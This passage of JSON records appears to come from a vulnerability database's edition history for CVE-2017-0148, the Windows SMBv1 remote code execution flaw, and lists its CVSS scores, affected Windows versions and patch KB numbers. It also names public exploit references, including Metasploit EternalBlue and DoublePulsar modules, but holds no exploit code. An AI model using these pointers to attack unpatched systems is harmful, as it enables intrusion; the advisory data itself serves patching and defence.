x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T16:54:43", "differentElements": ["msAffectedSoftware"], "edition": 22}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-09T05:02:02", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T16:54:43", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-08T16:54:43", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3213986", "KB4012213", "KB3177186", "KB3205409", "KBMS16-110, 3187754", "KB4013198", "KB3210721", 
"KB3212646", "KB4012214", "KB4012606", "KB3210720", "KB4012216", "KB4012217", "KB4012215", "KB4012598", "KB3205401", "KB4012212", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T05:02:02", "differentElements": ["msAffectedSoftware"], "edition": 23}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", 
"title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-09T06:50:25", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 
"symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-09T06:50:25", "rev": 2}, "score": {"value": 7.3, 
"vector": "NONE", "modified": "2021-09-09T06:50:25", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012214", "KB4012217", "KB4012216", "KB4013198", "KB3212646", "KBMS16-110, 3187754", "KB4012215", "KB3210721", "KB3177186", "KB4012598", "KB3205401", "KB4013429", "KB4012213", "KB4012606", "KB3213986", "KB3210720", "KB4012212"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for 
x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems 
Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-09T06:50:25", "differentElements": ["msAffectedSoftware"], "edition": 24}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-10T08:45:32", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": 